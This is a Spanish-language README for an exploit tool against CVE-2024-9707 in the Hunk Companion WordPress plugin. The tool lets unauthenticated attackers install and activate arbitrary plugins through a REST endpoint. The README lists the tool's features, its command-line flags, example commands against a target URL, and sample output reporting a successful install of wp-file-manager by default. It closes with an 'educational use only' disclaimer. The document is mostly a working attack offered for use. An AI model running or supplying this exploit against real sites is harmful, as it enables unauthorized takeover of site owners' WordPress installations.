
El complemento Hunk Companion para WordPress: vulnerable a la instalación/activación no autorizada de complementos (versiones hasta la 1.8.4 inclusive)
Este script explota la vulnerabilidad en el plugin Hunk Companion de WordPress (CVE-2024-9707), permitiendo a atacantes no autorizados instalar y activar plugins arbitrarios a través del endpoint de la API REST /wp-json/hc/v1/themehunk-import.
| Característica | Descripción |
|---|---|
| Detección de versión del plugin | Comprueba automáticamente la versión del plugin. |
| Verificación de vulnerabilidad | Determina si la versión detectada es vulnerable (<= 1.8.4). |
| Instalación del plugin | Explota la vulnerabilidad para instalar y activar un plugin específico. |
requests, argparse.pip install requests
options:
-h, --help show this help message and exit
-u URL, --url URL Base URL of the WordPress site.
-p PLUGIN, --plugin PLUGIN
Plugin name (default: wp-file-manager).
2- Ejecutar el script
python CVE-2024-9707.py -u <TARGET_URL> [-p <PLUGIN_NAME>]
python CVE-2024-9707.py -u https://example.com -p wp-file-manager
Detected version: 1.8.4
The site is vulnerable. Proceeding with exploitation.
Plugin installed and activated successfully.
Response Status: 200
Response Body: "http:\/\/192.168.100.74\/wordpress"
Este script es solo para fines educativos. Úsalo de forma responsable y únicamente en sistemas que poseas o sobre los que tengas permiso explícito para realizar pruebas. Los autores no son responsables de ningún uso indebido o daño causado por esta herramienta. by: Khaled_alenazi | Nxploited